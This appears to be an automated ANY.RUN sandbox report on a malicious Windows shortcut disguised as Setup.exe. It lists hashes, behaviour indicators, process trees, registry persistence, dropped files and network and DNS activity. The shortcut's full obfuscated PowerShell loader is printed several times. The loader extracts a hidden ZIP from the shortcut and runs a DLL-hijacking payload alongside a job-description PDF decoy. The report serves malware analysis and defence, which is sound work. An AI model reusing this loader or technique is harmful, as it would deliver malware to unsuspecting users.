| File name: | Setup.exe |
| Full analysis: | https://app.any.run/tasks/15b45814-09ca-42b1-886f-3e4fa15db58a |
| Verdict: | Malicious activity |
| Analysis date: | March 15, 2024, 09:17:32 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | MS Windows shortcut, Has Description string, Has command line arguments, Icon number=13, ctime=Mon Jan 1 00:00:00 1601, mtime=Mon Jan 1 00:00:00 1601, atime=Mon Jan 1 00:00:00 1601, length=0, window=hidenormalshowminimized |
| MD5: | 8E37E230E3707CED709DC00DCBFD2ABF |
| SHA1: | 06D311A6DB6CA9A6BCF15630BE7E9C6CE8098DA4 |
| SHA256: | 2D83B80D9645B3A871FA5BEE4FF74E47926E053A4B64F15ED1725E89D2099B5B |
| SSDEEP: | 3072:tMGwx6nZ7tKPUqDnr06tMThIKLHuxJAXjEVvQwmJnjF/09bV2h/QsaUV7ZTphvCu:hnZ7IUqfrMnLOQXwQwcT6Wd1hvCaVt |
MALICIOUS
Run PowerShell with an invisible window
- powershell.exe (PID: 1912)
Drops the executable file immediately after the start
- powershell.exe (PID: 1912)
- Setup.exe (PID: 3532)
The DLL Hijacking
- Setup.exe (PID: 3532)
Changes the autorun value in the registry
- Setup.exe (PID: 3532)
SUSPICIOUS
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 1192)
Starts CMD.EXE for commands execution
- conhost.exe (PID: 1404)
PowerShell delay command usage (probably sleep evasion)
- powershell.exe (PID: 1912)
Process drops legitimate windows executable
- powershell.exe (PID: 1912)
- Setup.exe (PID: 3532)
Executable content was dropped or overwritten
- powershell.exe (PID: 1912)
- Setup.exe (PID: 3532)
Starts a Microsoft application from unusual location
- Setup.exe (PID: 3532)
Reads security settings of Internet Explorer
- Setup.exe (PID: 3532)
Creates file in the systems drive root
- Acrobat.exe (PID: 6360)
- Acrobat.exe (PID: 6592)
INFO
The executable file from the user directory is run by the Powershell process
- Setup.exe (PID: 3532)
Checks supported languages
- Setup.exe (PID: 3532)
- acrobat_sl.exe (PID: 6324)
Reads the computer name
- Setup.exe (PID: 3532)
Application launched itself
- Acrobat.exe (PID: 6360)
- AcroCEF.exe (PID: 2012)
Checks proxy server information
- Setup.exe (PID: 3532)
Executable content was dropped or overwritten
- AdobeARM.exe (PID: 4272)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .lnk | | | Windows Shortcut (100) |
|---|
EXIF
LNK
| Flags: | Description, CommandArgs, IconFile, Unicode, ExpString, PreferEnvPath |
|---|---|
| FileAttributes: | (none) |
| TargetFileSize: | - |
| IconIndex: | 13 |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| Description: | Type: Text Document Size: 391,2KB KB Date modified: 30/11/2024 14:56 |
| CommandLineArguments: | --headless cmd /c p^o^w^e^r^s^h^e^l^l -w^i^n^d^o^w^s^t^y^l^e h^i^d^d^e^n Start-Sleep 2;$23r23rf34 = Get-ChildItem -Path $env:TEMP -Recurse -File -Filter *.lnk ^| Select-Object -ExpandProperty FullName; if ($23r23rf34.Count -eq 0) {$23r23rf34 = Get-ChildItem -Path $MyInvocation.MyCommand.Path -Recurse -File -Filter *.lnk ^| where-object {$_.length -eq 00196182} ^| Select-Object -ExpandProperty FullName};$bkhfu093f = [system.io.file]::ReadAllBytes($23r23rf34);$fjhj3209fnd = '%TMP%\tmp'+(Get-Random)+'.zip';$fjhj3209fnd = [Environment]::ExpandEnvironmentVariables($fjhj3209fnd);$obf_dir = [System.IO.Path]::GetDirectoryName($fjhj3209fnd);[System.IO.File]::WriteAllBytes($fjhj3209fnd, $bkhfu093f[004000..($bkhfu093f.length)]);cd $obf_dir;Expand-Archive -Path $fjhj3209fnd -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $fjhj3209fnd -EA SilentlyContinue -Force ^| Out-Null;^& .\Setup.exe;^& .\*.pdf |
| IconFileName: | %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe |
Total processes
150
Monitored processes
20
Malicious processes
3
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1192 | cmd /c p^o^w^e^r^s^h^e^l^l -w^i^n^d^o^w^s^t^y^l^e h^i^d^d^e^n Start-Sleep 2;$23r23rf34 = Get-ChildItem -Path $env:TEMP -Recurse -File -Filter *.lnk ^| Select-Object -ExpandProperty FullName; if ($23r23rf34.Count -eq 0) {$23r23rf34 = Get-ChildItem -Path $MyInvocation.MyCommand.Path -Recurse -File -Filter *.lnk ^| where-object {$_.length -eq 00196182} ^| Select-Object -ExpandProperty FullName};$bkhfu093f = [system.io.file]::ReadAllBytes($23r23rf34);$fjhj3209fnd = 'C:\Users\admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$fjhj3209fnd = [Environment]::ExpandEnvironmentVariables($fjhj3209fnd);$obf_dir = [System.IO.Path]::GetDirectoryName($fjhj3209fnd);[System.IO.File]::WriteAllBytes($fjhj3209fnd, $bkhfu093f[004000..($bkhfu093f.length)]);cd $obf_dir;Expand-Archive -Path $fjhj3209fnd -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $fjhj3209fnd -EA SilentlyContinue -Force ^| Out-Null;^& .\Setup.exe;^& .\*.pdf | C:\Windows\System32\cmd.exe | — | conhost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1404 | "C:\WINDOWS\system32\conhost.exe" --headless cmd /c p^o^w^e^r^s^h^e^l^l -w^i^n^d^o^w^s^t^y^l^e h^i^d^d^e^n Start-Sleep 2;$23r23rf34 = Get-ChildItem -Path $env:TEMP -Recurse -File -Filter *.lnk ^| Select-Object -ExpandProperty FullName; if ($23r23rf34.Count -eq 0) {$23r23rf34 = Get-ChildItem -Path $MyInvocation.MyCommand.Path -Recurse -File -Filter *.lnk ^| where-object {$_.length -eq 00196182} ^| Select-Object -ExpandProperty FullName};$bkhfu093f = [system.io.file]::ReadAllBytes($23r23rf34);$fjhj3209fnd = 'C:\Users\admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$fjhj3209fnd = [Environment]::ExpandEnvironmentVariables($fjhj3209fnd);$obf_dir = [System.IO.Path]::GetDirectoryName($fjhj3209fnd);[System.IO.File]::WriteAllBytes($fjhj3209fnd, $bkhfu093f[004000..($bkhfu093f.length)]);cd $obf_dir;Expand-Archive -Path $fjhj3209fnd -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $fjhj3209fnd -EA SilentlyContinue -Force ^| Out-Null;^& .\Setup.exe;^& .\*.pdf | C:\Windows\System32\conhost.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1912 | powershell -windowstyle hidden Start-Sleep 2;$23r23rf34 = Get-ChildItem -Path $env:TEMP -Recurse -File -Filter *.lnk | Select-Object -ExpandProperty FullName; if ($23r23rf34.Count -eq 0) {$23r23rf34 = Get-ChildItem -Path $MyInvocation.MyCommand.Path -Recurse -File -Filter *.lnk | where-object {$_.length -eq 00196182} | Select-Object -ExpandProperty FullName};$bkhfu093f = [system.io.file]::ReadAllBytes($23r23rf34);$fjhj3209fnd = 'C:\Users\admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$fjhj3209fnd = [Environment]::ExpandEnvironmentVariables($fjhj3209fnd);$obf_dir = [System.IO.Path]::GetDirectoryName($fjhj3209fnd);[System.IO.File]::WriteAllBytes($fjhj3209fnd, $bkhfu093f[004000..($bkhfu093f.length)]);cd $obf_dir;Expand-Archive -Path $fjhj3209fnd -DestinationPath . -EA SilentlyContinue -Force | Out-Null;Remove-Item -Path $fjhj3209fnd -EA SilentlyContinue -Force | Out-Null;& .\Setup.exe;& .\*.pdf | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2012 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16514043 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | — | Acrobat.exe | |||||||||||
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe AcroCEF Exit code: 0 Version: 23.1.20093.0 Modules
| |||||||||||||||
| 2432 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | — | AcroCEF.exe | |||||||||||
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe AcroCEF Exit code: 0 Version: 23.1.20093.0 Modules
| |||||||||||||||
| 2720 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2136 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | AcroCEF.exe | ||||||||||||
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe AcroCEF Exit code: 0 Version: 23.1.20093.0 Modules
| |||||||||||||||
| 3052 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --first-renderer-process --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2400 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | — | AcroCEF.exe | |||||||||||
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe AcroCEF Exit code: 0 Version: 23.1.20093.0 Modules
| |||||||||||||||
| 3532 | "C:\Users\admin\AppData\Local\Temp\Setup.exe" | C:\Users\admin\AppData\Local\Temp\Setup.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Device Census Exit code: 0 Version: 10.0.19645.1016 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3816 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2584 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | — | AcroCEF.exe | |||||||||||
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe AcroCEF Exit code: 0 Version: 23.1.20093.0 Modules
| |||||||||||||||
| 3868 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2600 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | — | AcroCEF.exe | |||||||||||
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe AcroCEF Exit code: 0 Version: 23.1.20093.0 Modules
| |||||||||||||||
Total events
36 834
Read events
36 695
Write events
136
Delete events
3
Modification events
| (PID) Process: | (1912) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts |
| Operation: | write | Name: | Acrobat.Document.DC_.pdf |
Value: 0 | |||
| (PID) Process: | (1912) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids |
| Operation: | write | Name: | Acrobat.Document.DC |
Value: | |||
| (PID) Process: | (1912) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (1912) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (1912) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (1912) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (6360) Acrobat.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934 |
| Operation: | write | Name: | DisplayName |
Value: Adobe Acrobat Reader Protected Mode | |||
| (PID) Process: | (3532) Setup.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
| Operation: | write | Name: | EdgeMicrosoft |
Value: C:\Users\Public\Edge\MicrosoftEdgeUpdate.exe | |||
| (PID) Process: | (6592) Acrobat.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection |
| Operation: | write | Name: | bLastExitNormal |
Value: 0 | |||
| (PID) Process: | (6592) Acrobat.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement |
| Operation: | write | Name: | bSynchronizeOPL |
Value: 0 | |||
Executable files
5
Suspicious files
128
Text files
32
Unknown types
33
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2vyrke5r.0ad.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\[Update JD] - Product Owner - export202401285675645456645645344556743412331486786463453454888.pdf | ||
MD5:85E03AE1AA0CF405B96AEC63F401702F | SHA256:E45E70BB3B0A521A43600B2AE5A754C505104049A2EB19CC221F98500D6CBDA8 | |||
| 1912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\dcntel.dll | executable | |
MD5:CE31B83605EBCFC4DDB0C740192D8FE6 | SHA256:BB1B01978148310192D46AECF0FBCA9B1CD57043250F8EAFD1D316730518FFC2 | |||
| 1912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Setup.exe | executable | |
MD5:D1B722A188C84E5059765FA87E8C5F32 | SHA256:1041623963E1A109B80312CBFE4DC4544CBAC478C2EB2597CA040E1C78585A3E | |||
| 1912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\tmp1425079198.zip | compressed | |
MD5:6C05F335CAFB13FC0CD065EEF8F23887 | SHA256:2FBF876A10B2684BCBFCC0E69A2C89024E5AB276243FD06C4EBCC6B2F464F70C | |||
| 1912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_a0iu3ads.gr1.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1912 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:94FF6F29E964D6A33A199D64D412BC35 | SHA256:0C62D58DD47F1EA0C0A098A45E5DBE190B094C87472919D3A401895254193F77 | |||
| 6592 | Acrobat.exe | C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\ACROBAT_SBX\ACRONGLLOG.TXT | text | |
MD5:E76040843F10E6ABE2422D4D38BCA97E | SHA256:9BCEAF5B9B999FF09A4D0410BE0A01E5DB313FC5C23084D4786DE6D3D6BE4D8B | |||
| 6592 | Acrobat.exe | C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING | mp3 | |
MD5:DC84B0D741E5BEAE8070013ADDCC8C28 | SHA256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 | |||
| 6592 | Acrobat.exe | C:\USERS\ADMIN\APPDATA\LOCAL\ADOBE\ACROBAT\DC\SHAREDDATAEVENTS | sqlite | |
MD5:138FF48CF99ABB957CB07D3C44918D71 | SHA256:29078610DA7C3A129662CF431FD16C2DF60C7D644885DDB5A3272901C94CA0E4 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
43
DNS requests
26
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4272 | AdobeARM.exe | GET | 404 | 2.22.242.136:80 | http://acroipm2.adobe.com/assets/Owner/arm/2024/3/OwnerAPI/Rdr.txt | unknown | html | 357 b | unknown |
4272 | AdobeARM.exe | GET | 404 | 2.22.242.136:80 | http://acroipm2.adobe.com/assets/Owner/arm/2024/3/UC/Other.txt | unknown | html | 353 b | unknown |
4272 | AdobeARM.exe | GET | 200 | 2.22.242.136:80 | http://acroipm2.adobe.com/assets/Owner/arm/ReportOwner.txt | unknown | text | 4 b | unknown |
4272 | AdobeARM.exe | GET | 200 | 2.22.242.136:80 | http://acroipm2.adobe.com/assets/Owner/arm/ProcessMAU.txt | unknown | text | 4 b | unknown |
4272 | AdobeARM.exe | GET | 404 | 2.22.242.136:80 | http://acroipm2.adobe.com/assets/Owner/arm/11/adnme/NoValidReasonForAdnme.txt | unknown | html | 368 b | unknown |
1088 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | unknown | binary | 314 b | unknown |
3996 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown |
3996 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown |
4352 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D | unknown | binary | 471 b | unknown |
4272 | AdobeARM.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D | unknown | binary | 471 b | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4828 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
3996 | svchost.exe | 20.190.160.17:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1280 | MoUsoCoreWorker.exe | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
2720 | AcroCEF.exe | 23.43.60.134:443 | geo2.adobe.com | Akamai International B.V. | US | unknown |
4272 | AdobeARM.exe | 2.22.242.136:80 | acroipm2.adobe.com | Akamai International B.V. | DE | unknown |
5904 | svchost.exe | 88.221.124.138:443 | armmf.adobe.com | AKAMAI-AS | DE | unknown |
2720 | AcroCEF.exe | 34.237.241.83:443 | p13n.adobe.io | AMAZON-AES | US | unknown |
3996 | svchost.exe | 40.126.32.68:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
3996 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
1088 | backgroundTaskHost.exe | 2.19.96.19:443 | www.bing.com | Akamai International B.V. | DE | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
NGlzOiV5LX2wNWZvNyF.ns1.truecorps.co.th |
| unknown |
IVEGH3IKFX3PI1wNHlwV.ns1.truecorps.co.th |
| unknown |
geo2.adobe.com |
| whitelisted |
acroipm2.adobe.com |
| whitelisted |
armmf.adobe.com |
| whitelisted |
p13n.adobe.io |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
IVEGH3IKFX3PI1wNHlwV.ns2.truecorps.co.th |
| unknown |
www.bing.com |
| whitelisted |
arc.msn.com |
| whitelisted |